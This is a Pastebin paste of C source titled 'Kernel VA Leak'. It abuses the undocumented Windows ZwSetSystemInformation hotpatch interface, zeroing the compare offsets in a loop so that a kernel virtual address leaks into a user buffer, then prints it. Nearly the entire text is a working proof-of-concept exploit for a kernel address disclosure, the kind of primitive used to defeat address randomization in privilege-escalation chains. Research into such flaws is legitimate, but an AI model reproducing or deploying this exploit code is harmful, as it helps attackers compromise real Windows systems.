Advertisement
waliedassar

Kernel VA Leak

Apr 18th, 2013
860
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.21 KB | None | 0 0
  1. //http://waleedassar.blogspot.com
  2.  
  3.  
  4. #include "stdafx.h"
  5. #include "windows.h"
  6. #include "stdio.h"
  7.  
  8. #define SystemHotpatchInformation    0x45
  9.  
  10. extern "C"
  11. {
  12.     int __stdcall ZwSetSystemInformation(unsigned long,void*,unsigned long);
  13. }
  14.  
  15.  
  16. struct LARGE_INTEGER_
  17. {
  18.     unsigned long Low;
  19.     unsigned long High;
  20. };
  21.  
  22. struct _HOTPATCH_CHUNK
  23. {
  24.     LARGE_INTEGER_ Address; //To be Probed, Locked, mapped, etc
  25.     LARGE_INTEGER_ SourceAddress; //receives mapped address, system-wide kernel virtual address
  26.  
  27.     unsigned long SecondCompareOffset; // Set it to Zero to leak
  28.     unsigned long ByteCount;
  29.     unsigned long SecondCompareOffset_x;//Set it to Zero to leak
  30.     unsigned long CompareOffset;//Set it to Zero to leak
  31.     unsigned long CompareSize;
  32.     unsigned long Pad4;
  33. };
  34.  
  35. struct _HOTPATCH_INFO
  36. {  
  37.     unsigned long Flags;
  38.         unsigned long Size;
  39.         unsigned long NumberOfChunks;
  40.         unsigned long pad0;
  41.     _HOTPATCH_CHUNK Chunk[1];//You can increase it
  42. };
  43.  
  44. void* pNops;
  45. _HOTPATCH_INFO* pInput;
  46.  
  47. void Alloc(unsigned long TotalSize)
  48. {
  49.     pNops=VirtualAlloc(0,0x1000,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
  50.    
  51.     //---------------------------
  52.     pInput=(_HOTPATCH_INFO*)VirtualAlloc(0,TotalSize,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
  53.    
  54. }
  55.  
  56.  
  57. void main()
  58. {
  59.        
  60.        
  61.    unsigned long NumberOfChunks=0x650;
  62.    unsigned long TotalSize = ((NumberOfChunks+1)*sizeof(_HOTPATCH_CHUNK))+0x10;
  63.    printf("Total Size is %x\r\n",TotalSize);
  64.    Alloc(TotalSize);
  65.  
  66.    while(1)
  67.    {       
  68.         memset(pNops,0x90,0x1000);
  69.         memset(pInput,0,TotalSize);
  70.         pInput->Flags=0;
  71.         pInput->Size=TotalSize;
  72.         pInput->NumberOfChunks=NumberOfChunks+1;
  73.         unsigned long i=0;
  74.         for(i=0;i<NumberOfChunks;i++)
  75.         {
  76.              pInput->Chunk[i].Address.Low=(unsigned long)pNops;
  77.              pInput->Chunk[i].ByteCount=0x1000;
  78.         }
  79.         pInput->Chunk[i].Address.Low=(unsigned long)pNops; //(unsigned long)0x7FFE0000;
  80.         pInput->Chunk[i].ByteCount=0x1000;
  81.         int ret=ZwSetSystemInformation(SystemHotpatchInformation,pInput,TotalSize);
  82.         printf("Return value is %x\r\n",ret);
  83.         if(ret==0)
  84.         {
  85.             printf("Leaked address is %p`%p\r\n",*(unsigned long*)((unsigned long)pNops+0x001C),*(unsigned long*)((unsigned long)pNops+0x018) );
  86.         }
  87.    }
  88.    return;
  89. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement